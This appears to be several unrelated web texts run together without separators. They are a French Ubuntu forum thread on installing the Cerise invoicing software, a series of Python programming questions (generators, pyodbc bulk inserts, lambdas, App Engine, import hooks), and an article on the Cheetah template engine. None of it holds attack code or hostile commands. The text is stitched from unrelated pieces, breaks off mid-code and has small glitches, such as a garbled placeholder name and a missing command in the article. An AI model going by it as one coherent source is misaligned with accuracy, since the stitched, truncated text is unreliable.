intérêt, je pense que c'est très bien, j'ai été commerçant pendant 20 ans, le principale problème à mon avis c'est que c'est très difficile à installer, pour quelqu'un qui m'a pas le temps, et peut être pas les connaissances nécessaires, c'est tout à fait impossible d'installer ce logiciel, pour faire plus simple, un paquet deb , pour mon cas personnel serait plus approprié. Merci Hors ligne Le Monolecte Re : Cerise 0.8 - TPE, freelances, artisans Bonjour à tous, Je trouve que cerise est probablement le petit logiciel libre de facturation qui va bien pour les TPE et les indé. Par contre, pour l'installation, c'est super coton. J'ai tenté d'installer en téléchargeant la svn, ce qui se fait facilement en ligne de commande et en suivant le tuto. Sous Ubuntu, j'ai LAMP qui tourne. J'ai tenté de modifié dev.cfg pour que ça le fasse, en décommentant la ligne # sqlobject.dburi="mysql://utilisateur:mot de pass@localhost:8080/cerise", cerise étant la base de données que j'ai créé dans phpmyadmin pour cerise... mais elle n'était pas sur le gâteau. J'ai pris la version de _renderPM.so qui va bien en la renommant directement dans les fichiers installés par svn et je lance tg-admin sql create Et là, c'est le drame : Using database URI mysql://[i]l'utilisateur de mysql[/i]:[i]le mot de passe de cet utilisateur[/i]@localhost:8080/cerise Traceback (most recent call last): File "/usr/bin/tg-admin", line 8, in <module> load_entry_point('TurboGears==1.0.4.3', 'console_scripts', 'tg-admin')() File "/var/lib/python-support/python2.5/turbogears/command/base.py", line 379, in main command.run() File "/var/lib/python-support/python2.5/turbogears/command/base.py", line 128, in run command.the_runner.run(sys.argv) File "/usr/lib/python2.5/site-packages/sqlobject/manager/command.py", line 101, in run runner.run() File "/usr/lib/python2.5/site-packages/sqlobject/manager/command.py", line 307, in run self.command() File "/usr/lib/python2.5/site-packages/sqlobject/manager/command.py", line 628, in command for soClass in self.classes(require_some=True): File "/usr/lib/python2.5/site-packages/sqlobject/manager/command.py", line 329, in classes conn = self.connection() File "/usr/lib/python2.5/site-packages/sqlobject/manager/command.py", line 390, in connection return sqlobject.connectionForURI(self.options.connection_uri) File "/usr/lib/python2.5/site-packages/sqlobject/dbconnection.py", line 1079, in connectionForURI conn = self.schemeBuilders[scheme]().connectionFromURI(uri) File "/usr/lib/python2.5/site-packages/sqlobject/mysql/mysqlconnection.py", line 56, in connectionFromURI host=host or 'localhost', port=port or 0, **args) File "/usr/lib/python2.5/site-packages/sqlobject/mysql/mysqlconnection.py", line 23, in __init__ import MySQLdb, MySQLdb.constants.CR, MySQLdb.constants.ER ImportError: No module named MySQLdb Donc, quoi qu'il faut faire? Le dossier de cerise s'est installé par défaut à la racine de mon dossier utilisateur. Il faut que je le déplace dans mon interface WWW pour mysql (que j'ai placé sur le /home par mesure de Sécurité)? Bref, j'aimerais vraiment bien pouvoir tester cerise en local pour le valider, voir s'il me convient en production pour ensuite rémunérer (modestement, hélas) le créateur et faire la pub du truc!:) 13.10 (64) - Dell Latitude E4310 Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans Hello, désolé du délai de réponse, j'étais en plein déménagement, et j'avais quelques soucis de ligne ADSL.. Je crois que je vais modifier la page d'installation, en effet sous Ubuntu les paquets Python utilisés par TurboGears et Cerise sont assez foireux. Je conseille de les installer via easy_install, ça règle 99.99% des problèmes. Donc : sudo aptitude install python-setuptools Et ensuite : sudo easy_install sqlobject Idem pour sqlite. MySQLdb devrait passer avec. Ça devrait régler vos problèmes à vous deux. Concernant la facilité d'installation, si on installe tout avec easy_install, très honnêtement, c'est bien plus simple d'installer Cerise que n'importe quel autre PGI web Je manque cruellement de temps, mais je ne désespère pas de faire un paquet Python (un EGG), ça évitera quasi tous les problèmes. En tout cas si des gens (autres que mes clients) commencent à utiliser le logiciel et à rapporter des bugs, des retours d'expérience, etc, çe n'en sera que très bénéfique, donc merci à vous de tester ce logiciel assez jeune. Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Bonsoir Guillaume, je viens de recommencer l'installation comme tu viens de la décrire. J'ai dû passer par Synaptic pour installer SQLite et MySQLdb. Peux-tu nous expliquer ce que signifie cette phrase (en langage néophyte ): Il est conseillé de recompiler la librairie renderPM et de l'installer de façon "classique" : python setup.py install. Elle peut être récupérée sur http://www.reportlab.org/downloads.html section renderPM 1.06. Quelles sont les infos à entrer dans le fichier CerisePGI/devCFG? Une fois ceci expliqué, on doit tenir le bon bout, non? Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans Bonsoir Guillaume, je viens de recommencer l'installation comme tu viens de la décrire. J'ai dû passer par Synaptic pour installer SQLite et MySQLdb. Peux-tu nous expliquer ce que signifie cette phrase (en langage néophyte ): Il est conseillé de recompiler la librairie renderPM et de l'installer de façon "classique" : python setup.py install. Elle peut être récupérée sur http://www.reportlab.org/downloads.html section renderPM 1.06. Quelles sont les infos à entrer dans le fichier CerisePGI/devCFG? Une fois ceci expliqué, on doit tenir le bon bout, non? Je ne suis pas l'auteur de la phrase En fait ça dit juste qu'il est préférable (mais pas du tout obligatoire) de recompiler renderPM, plutôt que d'utiliser le fichier _renderPM.so fourni avec Cerise. Mais tu peux ignorer cette phrase, normalement ça ne pose aucun soucis. Pour le fichier dev.cfg, en fait si tu ne modifie rien du tout ça fonctionne quand même, Cerise va utiliser un fichier SQLITE pour la base de donnée, et le port de connexion sera le 8080. Le fichier sert juste à modifier ça principalement. Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Que signifie recompiler renderPM et comment fait-on pour recompiler renderPM? Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans Là tu recherches la complexité renderPM est une lib de Reportlab (pour générer les images), qui doit être compilée (on passe du code source à un fichier binaire). Elle est déjà compilée, c'est le fichier .so à la racine, mais si on veut on peut la recompiler pour son système. Mais premièrement, comme déjà dit, c'est inutile, et secondement Cerise dans sa version actuelle n'utilise même plus renderPM (je suis passé à du flash pour les graphiques). Mais je le garde car j'en aurais peut-être encore besoin. Voilà Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans J'espérais juste avoir oublié, zappé une étape qui explique mes problèmes d'installation. Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans Il te reste quoi comme problème ? J'ai installé Cerise dans une machine virtuelle sous Ubuntu 8.04 hier soir avec les commandes que je t'ai cité, et ça fonctionne sans soucis. Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans J'ai pu créer mon entreprise depuis la page d'accueil mais dès que je valide, j'obtiens... Bon, voila que je n'arrive plus à démarrer le serveur CerisePGI. A la commande, j'obtiens ça: root@studio-desktop:~# python start-cerisepgi.py python: can't open file 'start-cerisepgi.py': [Errno 2] No such file or directory Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Je suis obligé de regénérer une BdB avec tg-admin sql create pour pouvoir ensuite lancer le serveur. A la création de la BdD, j'obtiens à nouveau la réponse que j'ai posté dans mon messge n°9 plus haut. Ensuite, lorsque je me connecte avec mes ID au serveur, j'obtiens ce message en accueil: 500 Internal error The server encountered an unexpected condition which prevented it from fulfilling the request. Page handler: <bound method Root.dashboard of <cerisepgi.controllers.root.Root object at 0x8ed8e2c>> Traceback (most recent call last): File "/var/lib/python-support/python2.5/cherrypy/_cphttptools.py", line 105, in _run self.main() File "/var/lib/python-support/python2.5/cherrypy/_cphttptools.py", line 254, in main body = page_handler(*virtual_path, **self.params) File "<string>", line 3, in dashboard File "/var/lib/python-support/python2.5/turbogears/controllers.py", line 363, in expose *args, **kw) File "<string>", line 5, in run_with_transaction File "/var/lib/python-support/python2.5/turbogears/database.py", line 356, in so_rwt retval = func(*args, **kw) File "<string>", line 5, in _expose File "/var/lib/python-support/python2.5/turbogears/controllers.py", line 378, in <lambda> mapping, fragment, args, kw))) File "/var/lib/python-support/python2.5/turbogears/controllers.py", line 405, in _execute_func output = errorhandling.try_call(func, *args, **kw) File "/var/lib/python-support/python2.5/turbogears/errorhandling.py", line 72, in try_call return func(self, *args, **kw) File "<string>", line 3, in dashboard File "/var/lib/python-support/python2.5/turbogears/identity/conditions.py", line 242, in require return fn(self, *args, **kwargs) File "/home/gml/cerise/0.8/CerisePGI/cerisepgi/controllers/root.py", line 80, in dashboard File "/usr/lib/python2.5/site-packages/sqlobject/sqlbuilder.py", line 381, in __getattr__ raise AttributeError("%s instance has no attribute '%s'" % (self.soClass.__name__, attr)) AttributeError: Invoice instance has no attribute 'enterprise' Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Tout se résout en installant la dernière version de SQLObject là: http://packages.ubuntu.com/fr/intrepid/ … t/download Hors ligne yanfox Re : Cerise 0.8 - TPE, freelances, artisans Bonsoir, je suis dans la panade également, j'ai voulu installer cerise 0.8 mais j'obtiens le même message d'erreur que cité plus haut : Warning: a circular reference was detected in the model. Unable to sort the classes by dependency: they will be treated in alphabetic order. This may or may not work depending on your database backend. The error was:Found a circular reference: Activity --> Enterprise --> Address --> Contact --> Company --> Contact j'ai suivi les instructions du wiki à la lettre mais rien 'y fait... j'ai également tenté de faire les manipulations décrites plus haut sans succès... j'ai cette fichue erreur lorsque je créé ma bdd. Merci de votre aide EDIT : Bon j'ai toujours le message d'erreur mais le script veux bien lancer à présent, je commence à m'immerger dans ce logiciel qui me semble très prometteur. Au bout de 3 minutes d'utilisation je suis quasi conquis, il ne manque plus qu'un peu de personnalisation dans tout ça et ça va être d'enfer EDIT 2 : je suis emballé quelques petites remarques qui serons j'espère utiles : - Au niveau de la gestion client, il serait bien d'avoir quelques champs supplémentaires genre mail, téléphone etc. - Toujours niveau client, j'en ai certains qui ont plusieurs sociétés, ça serait génial si il était possible d'avoir un client lié à plusieurs sociétés (avec différentes fonctions, numéro de téléphone... etc), ca éviterai les doublons. - Un peu plus de personnalisation sur l'apparence des devis/factures, genre un logo ou autre. Peux-être via un système de skin (?). L'ajout de quelques lignes en fin de factures telles que : règlement par chèque ou virement le matériel reste la propriété de "entreprise" jusqu'au paiement complet des sommes dues... - au niveau de l'aide au calcul de TVA, un affichage par mois ou trimestre serait bien Par ailleurs je voulais m'inscrire à la mailing list mais visiblement ele est en vrac pour le moment Félicitations pour ce bel outil qui a un bel avenir je pense Je vais d'ailleurs commencer a travailler en doublon avec mon système de facturation actuel histoire de m'y faire ! Dernière modification par yanfox (Le 27/11/2008, à 20:02) Hors ligne HKH Re : Cerise 0.8 - TPE, freelances, artisans hello j ai testé ce petit logiciel bien sympa. J avais la même erreur que Yris sous ubuntu Hardy 8.04.1 , résolu en installant la dernière version de SQLObject comme péconisé par Yris lui même...merci Un petit retour d'expérience : j ai consaté que le numéro de Devis contient la lettre "F" comme le numéro de Facture .. ? Au niveau de la gestion des produits , il serait peut etre pratique d'avoir un classement par catégorie voir sous catégorie..pour ceux qui ont plusieurs types de produits ( exemple d une entreprise multiservice) Peut etre que c est deja prévu pour la version future.. Vivement la version 0.9 qui ne devrait pas tarder ( vue sur le blog de GMLI ) Dernière modification par HKH (Le 22/12/2008, à 14:17) Hors ligne phil33 Re : Cerise 0.8 - TPE, freelances, artisans bonjour, comment entrer dans l'entreprise test, j'ai choisi benenuts et admin admin mais connection impossible ??
I have a text file like this: 1123411111 Using Python 2.7, I want to turn it into a list of lists of lines, where line breaks divide items in the inner list and empty lines divide items in the outer list. Like so: [["11","2","3","4"],["11"],["111"]] And for this purpose, I wrote a generator function that would yield the inner lists one at a time once passed an open file object: def readParag(fileObj): currentParag = [] for line in fileObj: stripped = line.rstrip() if len(stripped) > 0: currentParag.append(stripped) elif len(currentParag) > 0: yield currentParag currentParag = [] That works fine, and I can call it from within a list comprehension, producing the desired result. However, it subsequently occurred to me that I might be able to do the same thing more concisely using itertools.takewhile (with a view to rewriting the generator function as a generator expression, but we'll leave that for now). This is what I tried: from itertools import takewhile def readParag(fileObj): yield [ln.rstrip() for ln in takewhile(lambda line: line != "\n", fileObj)] In this case, the resulting generator yields only one result (the expected first one, i.e. ["11","2","3","4"]). I had hoped that calling its next method again would cause it to evaluate takewhile(lambda line: line != "\n", fileObj) again on the remainder of the file, thus leading it to yield another list. But no: I got a StopIteration instead. So I surmised that the take while expression was being evaluated once only, at the time when the generator object was created, and not each time I called the resultant generator object's next method. This supposition made me wonder what would happen if I called the generator function again. The result was that it created a new generator object that also yielded a single result (the expected second one, i.e. ["11"]) before throwing a StopIteration back at me. So in fact, writing this as a generator function effectively gives the same result as if I'd written it as an ordinary function and returned the list instead of yielding it. I guess I could solve this problem by creating my own class to use instead of a generator (as in John Millikin's answer to this question). But the point is that I was hoping to write something more concise than my original generator function (possibly even a generator expression). Can somebody tell me what I'm doing wrong, and how to get it right?
With this table: CREATE TABLE test_insert ( col1 INT, col2 VARCHAR(10), col3 DATE ) the following code takes 40 seconds to run: import pyodbc from datetime import date conn = pyodbc.connect('DRIVER={SQL Server Native Client 10.0};' 'SERVER=localhost;DATABASE=test;UID=xxx;PWD=yyy') rows = [] row = [1, 'abc', date.today()] for i in range(10000): rows.append(row) cursor = conn.cursor() cursor.executemany('INSERT INTO test_insert VALUES (?, ?, ?)', rows) conn.commit() The equivalent code with psycopg2 only takes 3 seconds. I don't think mssql is that much slower than postgresql. Any idea on how to improve the bulk insert speed when using pyodbc? EDIT: Add some notes following ghoerz's discovery In pyodbc, the flow of executemany is: prepare statement loop for each set of parameters bind the set of parameters execute In ceODBC, the flow of executemany is: prepare statement bind all parameters execute
XML transformation via XSL Transformations (XSLT) is quite popular and indeed powerful. Well-constructed XSL can produce HTML, PDF, XML, and just about any other text format imaginable. XSLT, however, requires that the subject data be a well-structured XML document, which often is not the case. Consequently, developers often transform native data structures (that is, business objects) into XML so as to use XSLT. This process, unfortunately, can increase code complexity and development time for a problem that has an easier solution: a template engine. Template engines facilitate the construction of various formatted documents by allowing a static template to contain placeholders for dynamic output. Hence, there is no temporary format such as XML. If the desired output is an HTML document, a template engine will operate on an HTML template that contains placeholders for values substituted at runtime. Using a template engine's transformation process is as simple as reading the template and providing a mapping of runtime values. The output of the transformation is the native format of the template--in this case, an HTML document. Similar to XSLT, template engines can produce any format possible, such as XML, HTML, and SQL; additionally, one can even use template engines as code generators. Template engines additionally facilitate the Model View Controller architecture by embodying the view component in templates. Cheetah is an extremely effective Python-powered template engine that can generate any text-based format. Cheetah's impressive yet simple template language (based on Python) can yield the most complex of documents; moreover, Cheetah's object-oriented representation of documents creates plenty of opportunities for the reuse of code. Cheetah also possesses an impressive caching mechanism that fits a variety of performance scenarios. Cheetah is surprisingly simple to use, as it essentially has two language constructs: placeholders and directives. Placeholders are values to substitute at runtime, and directives in effect are commands to execute at runtime. Placeholders are signified by $ signs and directives by # signs. With placeholders and directives in mind, the code below demonstrates a simple Cheetah template for generating PyUnit test cases. 1 import unittest 2 3 class ${classundertest}_test(unittest.TestCase): 4 def setUp(self): 5 pass 6 def tearDown(self): 7 pass 8 #for $testcase in $testcases 9 def test${testcase}(self): 10 pass 11 #end for Cheetah will substitute the placeholder $clssundertst at runtime to create a string, such as query_test, that will form the test case's class name. Additionally, notice the directive, which in this case is a for loop, which iterates over a collection of testcases to create a series of class methods with names starting with test. $Placeholders To make ambiguous placeholders less ambiguous, you can surround them with {s, (s, [s, or nothing at all. Placeholders, furthermore, can be complex objects, which Cheetah can navigate quite easily through autocalling. 1 <person> 2 <firstname>$fname</firstname> 3 <middleinitial>$(mi)</middleinitial> 4 <lastname>${lname}</lastname> 5 <dateofbirth>$p.dob</dateofbirth> 6 </person> As demonstrated in the above example, Cheetah is quite flexible when it comes to syntax. Notice that p.dob actually calls the dob attribute of the p object. Autocalling is quite flexible; you can use dictionaries as well as lists. Here's an example of autocalling with a dictionary: 1 <person> 2 <firstname>$dict.fname</firstname> 3 <middleinitial>$dict['mi']</middleinitial> 4 <lastname>$dict.lname</lastname> 5 <dateofbirth>$dict.dob</dateofbirth> 6 </person> In the code above, $dict is a dictionary object defined something like this: 1 mp = {"fname":"Emily", "mi":"M", \ 2 "lname":"Smith", "dob":"04/21/74"} 3 inputmap = {"dict":mp} The $dict placeholder maps to a dictionary, mp, which contains the keys accessed in the previous code. Directives are constructs that control the flow of template logic. With directives, templates can contain if/else logic blocks as well as looping constructs. What's more, it's possible to define Python functions through directives and call them throughout a template. Using conditional logic is straightforward, as the syntax is Python. 1 #if $status == 'rejected' 2 <b>Don't call us, we'll call you</b> 3 #elif $status == 'passed' 4 We'll be calling you soon. 5 #end if Looping constructs, like the for loop, are just as simple. 1 #for $person in $people 2 <TR> 3 <TD>$person.name</TD> 5 <TD>$person.weight</TD> 6 <TD>$person.height</TD> 7 </TR> 8 #end for In the above example, a list named people contains a collection of objects having attributes of name, weight, and height. If you need repetition, use the repeat directive: 1 <p> 2 Remember, your proposal was: <br/> 3 #repeat $times 4 $status <br/> 5 #end repeat 6 </p> Notice how the #repeat directive takes a placeholder, in this case $times, which represents the number of times to repeat the text in the directive's body. Occasionally, templates may need additional logic defined in a function. Strict Model-View-Controller design tries to avoid putting too much logic in a view, but you can define functions in templates and call them throughout the template at runtime. The following example defines a function named caps switches the case of the passed-in parameter. Line 8 shows how to reference the directive and pass in placeholders. 1 #def caps($var) 2 $var.swapcase() #slurp 3 #end def 4 5 <html> 6 <body> 7 <p> 8 Your proposal was <b> $caps($status) </b> 9 </p> The #slurp declaration in the code above consumes the newline so the resulting output is: 1 <html> 2 <body> 3 <p> 4 Your proposal was <b> REJECTED </b> 5 </p> As mentioned earlier, Cheetah possesses a powerful caching mechanism for use in templates. As with everything else found in Cheetah, putting it to work is easy. In performance-intensive scenarios, caching placeholders can increase a template's rendering speed. To cache a placeholder indefinitely (or as long as the template resides in memory), use the * syntax. 1 <p> 2 Submissions will be accepted 3 for $*days calendar days so please keep 4 trying until then. 5 </p> In the above example, Cheetah caches the days placeholder as long as the template resides in memory. If a template has more sophisticated caching requirements, you can cache placeholders for time intervals or even cache entire template regions. To cache for a specific time limit, add the desired value in terms of seconds, minutes, hours, days, or weeks. 1 <p> 2 After that, our $*4d*judges judges will 3 annouce the winners! 4 </p> The above example caches the placeholder, judges, for four days. For seconds, use an s, minutes an m, hours an h, and weeks a w. Caching an entire region is as simple as wrapping the region with a #cache directive. 1 #cache 2 <p> 3 Thanks again, <br/> 4 $staff 5 </p> 6 #end cache Incidentally, you can also fine-tune the #cache directive with time intervals. See the Cheetah documentation for more details. There are a few different ways to use templates. One of the easiest is to define the template in a file (commonly ending with a .tmpl suffix). To use it, read the template at runtime and supply it with a list of placeholder values. The list of placeholder values is a simple map, where the key should match the actual placeholder name. See the code below for an example. 1 tcs = ['runquery', 'executequery', 'deletequery'] 2 mp = {"classundertest":"query_runner", "testcases":tcs} 3 4 from Cheetah.Template import Template 5 t = Template(file="default_pyunit.tmpl", searchList=[mp]) As demonstrated above, Cheetah performs placeholder mappings at template instantiation; hence, you create a template and retrieve its associated output in two lines of code (lines 4 and 5). Notice the map defined in line 2 contains keys, which presumably match placeholders found in the template, default_pyunit.tmpl, as shown in the code from the first example. Cheetah treats templates as objects; moreover, these template objects are quite flexible and offer a few other usage strategies. To use templates as objects (accessing attributes, functions, and so on), you must compile them with Cheetah's compile command. For more information regarding compiling Cheetah templates, see the sidebar below. A compiled template's placeholders become attributes, which can be set at runtime. Directives become executable Python code. As shown below, using a compiled template is as simple as importing it and setting the object's associated attributes. 1 from default_pyunit import default_pyunit 2 3 tmpl = default_pyunit() 4 tmpl.classundertest = "query_runner" 5 tmpl.testcases = ['runquery', 'executequery'] 6 7 print tmpl Armed with a basic knowledge of how to tap Cheetah's power, you can quickly build dynamic applications and have a good time of it! Imagine a scenario where a development team, using a bug-tracking system (such as Bugzilla), would like a weekly email report (in HTML, of course) that summarized all new bugs. The desired viewable information for a bug is the bug's ID number, the project containing the bug, the developer to whom the bug has been assigned, and a short description of the bug. The template for this reporting application, as it turns out, is quite easy. Given a list of bug objects, a for loop directive will iterate over the list, creating a row in an HTML table with the corresponding ID, project name, owner, and description. In addition, some logic will determine whether the collection is empty so as to display an alternate message (perhaps congratulating the team for not creating any bugs for the week!). With the view (the template) and the model (a bug object) defined, the controller becomes quite simple. First, query the bug database, then fill the template, and finally send the corresponding HTML email report via SMTP. 1 def runreport(): 2 """ 3 main method to run the report 4 """ 5 6 import com.vanward.roach.template.template_engine as teng 7 import com.vanward.roach.email.email_engine as eeng 8 9 buglist = _getbuglist(7) 10 bmap = {"bugs":buglist, "numbugs":len(buglist), "numdays":7} 11 message = teng.getcontent(bmap) 12 13 email = _getemail(message) 14 15 eeng.sendemail(email) In the code above, the runreport() function does a few things. Line 9 retrieves a list of bugs from the _getbuglist() function, which queries a database for bugs by time. Line 10 places the returned list of bugs in a map, along with the number of bugs, the length of buglist, and the number of days on which the query performed a search. Line 11 retrieves the content of the report from the teng object (see below) and then passes it to an email engine, which sends the resulting report. 1 def getcontent(mapvls): 2 from Cheetah.Template import Template 3 t = Template(file=_templatename(), searchList=[mapvls]) 4 return t.respond() 5 6 def _templatename(): 7 import com.vanward.roach.util.properties as prop 8 tmpl = prop.templateproperties 9 return tmpl["tmpl"] The above code demonstrates a simple template engine that, when given a map of values, will instantiate a template and return the resulting body. Lines 6 through 9 define a function that returns the template's fully qualified name, such as $/var/tmp/bug_report.tmpl. 1 #include "header.txt" 2 <span>Bugzilla Weekly Summary</span> 3 #if $numbugs > 0 4 <p>Over the past $numdays days, the following bugs were created. 5 Click on the bug id to view the actual bugzilla bug report page.</p> 6 <br/> 7 <table border="0" width="400" valign="top"> 8 <TR> 9 <TD>Bug Id</TD> 10 <TD>Project</TD> 11 <TD>Assigned To</TD> 12 <TD>Short Description</TD> 13 </TR> 14 #for $bug in $bugs 15 <TR> 16 <TD><A HREF="http://acme.org/show_bug.cgi?id=$bug.id">$bug.id</A></TD> 17 <TD>$bug.product</TD> 18 <TD>$bug.assignedto</TD> 19 <TD>$bug.shortdescrpt</TD> 20 </TR> 21 #end for 22 </table> 23 #else 24 <p>No bugs were created in bugzilla this week. </p> 25 #end if 26 #include "footer.txt" The code above shows the resulting HTML bug report template. Line 1 and 26 demonstrate the #include directive, which as you have probably guessed by now includes text from outside a template. In this case, the report includes header and footer files, each containing a bit of static HTML. Line 3 demonstrates a simple #if directive, which will print some summary information if there are any bugs. The trailing #else and #end if are found on lines 23 and 25, respectively. Lines 14 through 21 use a #for directive to iterate over a list of bugs, creating an HTML table row for each one. Figure 1 shows the results of the Cheetah bug-reporting application. Figure 1. Output of the bug-reporting application. Cheetah offers the ability to compile template files into Python modules containing a class representing the template. These classes are easy to extend or agument. To compile a template, run the This yields a Python module with the same name as the template (in this case called class default_pyunit(Template) The class extends Cheetah's Template class, which is the default base class for all templates. The Cheetah template engine's simple language constructs and ease of use make data transformations a snap in terms of development time and complexity. What's more, Cheetah does not prevent architectures from using an MVC pattern, and Cheetah's built-in caching mechanism and object-oriented representation of templates yield an impressive alternative to XML transformations. The next time you have the task of building an application with a "view," consider putting Cheetah to the test. Andrew Glover is the founder and CTO of Vanward Technologies, a company specializing in building automated testing frameworks. Return to the Python DevCenter. Copyright © 2009 O'Reilly Media, Inc.
I have the following dictionary: student_loan_portfolio = { 'loan1': {'rate': .078, 'balance': 1000, 'payment': 100, 'prepayment': 0}, 'loan2': {'rate': .0645, 'balance': 10, 'payment': 5, 'prepayment': 0}, 'loan3': {'rate': .0871, 'balance': 250, 'payment': 60, 'prepayment': 0}, 'loan4': {'rate': .0842, 'balance': 200, 'payment': 37, 'prepayment': 0}, 'loan5': {'rate': .054, 'balance': 409, 'payment': 49, 'prepayment': 0}, 'loan6': {'rate': .055, 'balance': 350, 'payment': 50, 'prepayment': 0} } I would like to iterate through the containing dictionary (with keys loan1 through loan6) in order of the key containing the dictionary with the highest 'rate' value in its respective nested dictionary. That is, I would like to iterate in order of loan3, loan4, loan1, loan2, loan6, loan5 Thanks to @Jame Sharp the easiest way to do this that I know is: for k,v in sorted(student_loan_portfolio.items(), key=lambda (k,v): v['rate'], reverse=True): I am now reading about lambda and cannot really understand exactly how and why this works. First, v['rate'] I believe is returning the value of those dictionary keys. But its seems like it should be some kind of syntax error. what is v['rate'] referencing and what is the logic behind the syntax? On a related note, why, do we have to specify the inputs to the lambda function as a tuple? And how are the following cases different? #1 >>>f = lambda x,y,z:x + y + z >>>f(1,2,3) #6 >>>f = lambda (x,y,z): x + y + z >>>f(1,2,3) Traceback (most recent call last): File "<pyshell#48>", line 1, in <module> f(1,2,3) TypeError: <lambda>() takes exactly 1 argument (3 given) Thank you for the clarification.
Im just try to build a basic class so that I can learn some more about python. So far I have the following : class Bodymassindex: count = 0 def __init__(self,name,weight,height): self.name = name self.weight = 14 * weight self.height = 12 * height notes = "no notes have been assigned yet" bmitotal = 0 Bodymassindex.count += 1 def displayCount(self): print "Total number of objects is %d" % Bodymassindex.count def notesBmi(self,text): self.notes = text def calcBmi(self): return ( self.weight * 703 ) / ( self.height ** 2 ) In terms of adding a note variable and viewing what is the correct way of doing so ? Thanks,
I am trying to write my first GAE/Python application that does the following three things: Displays a form where the user can enter details about themself (index.html) Stores the submitted form data in the datastore Retrieves all data from datastore and displays all results above the form (index.html) However, I'm getting the following error line 15, in MainPage 'people' : people NameError: name 'people' is not defined Any advice on how to resolve this and get my app working will be appreciated! main.py import webapp2 import jinja2 import os jinja_environment = jinja2.Environment( loader=jinja2.FileSystemLoader(os.path.dirname(__file__))) class MainPage(webapp2.RequestHandler): def get(self): people_query = Person.all() people = people_query.fetch(10) template_values = { 'people': people } template = jinja_environment.get_template('index.html') self.response.out.write(template.render(template_values)) # retrieve the submitted form data and store in datastore class PeopleStore(webapp2.RequestHandler): def post(self): person = Person() person.first_name = self.request.get('first_name') person.last_name = self.request.get('last_name') person.city = self.request.get('city') person.birth_year = self.request.get('birth_year') person.birth_year = self.request.get('height') person.put() # models a person class class Person(db.Model): first_name = db.StringProperty() last_name = db.StringProperty() city = db.StringProperty() birth_year = db.IntegerProperty() height = db.IntegerProperty() app = webapp2.WSGIApplication([('/', MainPage), ('/new_person')], debug=True) index.html <html> <body> {% for person in people %} {% if person %} <b>{{ person.first_name }}</b> <b>{{ person.last_name }}</b> <b>{{ person.city }}</b> <b>{{ person.birth_year }}</b> <b>{{ person.height }}</b> <hr></hr> {% else %} No people found {% endfor %} <form action="/new_person" method="post"> <div><textarea name="first_name" rows="3" cols="60"></textarea></div> <div><textarea name="last_name" rows="3" cols="60"></textarea></div> <div><textarea name="city" rows="3" cols="60"></textarea></div> <div><textarea name="birth_year" rows="3" cols="60"></textarea></div> <div><textarea name="height" rows="3" cols="60"></textarea></div> <div><input type="submit" value="Submit"></div> </form> </body> </html> app.yaml application: some_name version: 1 runtime: python27 api_version: 1 threadsafe: true handlers: - url: /.* script: main.app libraries: - name: jinja2 version: latest EDIT 1*main.py* import webapp2 import jinja2 import os from google.appengine.ext import db jinja_environment = jinja2.Environment( loader=jinja2.FileSystemLoader(os.path.dirname(__file__))) class MainPage(webapp2.RequestHandler): def get(self): people_query = Person.all() people = people_query.fetch(10) template_values = { 'people': people } template = jinja_environment.get_template('index.html') self.response.out.write(template.render(template_values)) class PeopleStore(webapp2.RequestHandler): def post(self): person = Person() person.first_name = self.request.get('first_name') person.last_name = self.request.get('last_name') person.city = self.request.get('city') person.birth_year = self.request.get('birth_year') person.height = self.request.get('height') person.put() class Person(db.Model): first_name = db.StringProperty() last_name = db.StringProperty() city = db.StringProperty() birth_year = db.IntegerProperty() height = db.IntegerProperty() app = webapp2.WSGIApplication([('/', MainPage), ('/new_person')], debug=True) EDIT 2*main.py* The following edit fixed this error AttributeError: 'str' object has no attribute 'get_match_routes' app = webapp2.WSGIApplication([('/', MainPage),('/new_person',PeopleStore)], debug=True) Ok great, the form displays in the browser, but when I submit the data, I get this error: BadValueError: Property birth_year must be an int or long, not a unicode EDIT 3main.py person.birth_year = int(self.request.get('birth_year')) person.height = int(self.request.get('height')) resolved this error: badvalueerror property must be an int or long, not a unicode Ok, good so far. The data stores in the data store. However, my page comes up blank...
The biggest reason to keep the try/except/finally blocks in the code itself is that error recovery is usually an integral part of the function. For example, if we had our own int() function: def MyInt(text): return int(text) What should we do if text cannot be converted? Return 0? Return None? If you have many simple cases then I can see a simple decorator being useful, but I think the recipe you linked to tries to do too much: it allows a different function to be activated for each possible exception -- in cases such as those (several different exceptions, several different code paths) I would recommend a dedicate wrapper function. Here's my take on a simple decorator approach: class ConvertExceptions(object): func = None def __init__(self, exceptions, replacement=None): self.exceptions = exceptions self.replacement = replacement def __call__(self, *args, **kwargs): if self.func is None: self.func = args[0] return self try: return self.func(*args, **kwargs) except self.exceptions: return self.replacement and sample usage: @ConvertExceptions(ValueError, 0) def my_int(value): return int(value) print my_int('34') # prints 34 print my_int('one') # prints 0
I am using jython with a third party application. The third party application has some builtin libraries foo. To do some (unit) testing we want to run some code outside of the application. Since foo is bound to the application we decided to write our own mock implementation. However there is one issue, we implemented our mock class in python while their class is in java. Thus to use their code one would do import foo and foo is the mock class afterwards. However if we import the python module like this we get the module attached to the name, thus one has to write foo.foo to get to the class. For convenience reason we would love to be able to write from ourlib.thirdparty import foo to bind foo to the foo-class. However we would like to avoid to import all the classes in ourlib.thirdparty directly, since the loading time for each file takes quite a while. Is there any way to this in python? ( I did not get far with Import hooks I tried simply returning the class from load_module or overwriting what I write to sys.modules (I think both approaches are ugly, particularly the later)) edit: ok: here is what the files in ourlib.thirdparty look like simplified(without magic): foo.py: try: import foo except ImportError: class foo .... Actually they look like this: foo.py: class foo .... __init__.py in ourlib.thirdparty import sys import os.path import imp #TODO: 3.0 importlib.util abstract base classes could greatly simplify this code or make it prettier. class Importer(object): def __init__(self, path_entry): if not path_entry.startswith(os.path.join(os.path.dirname(__file__), 'thirdparty')): raise ImportError('Custom importer only for thirdparty objects') self._importTuples = {} def find_module(self, fullname): module = fullname.rpartition('.')[2] try: if fullname not in self._importTuples: fileObj, self._importTuples[fullname] = imp.find_module(module) if isinstance(fileObj, file): fileObj.close() except: print 'backup' path = 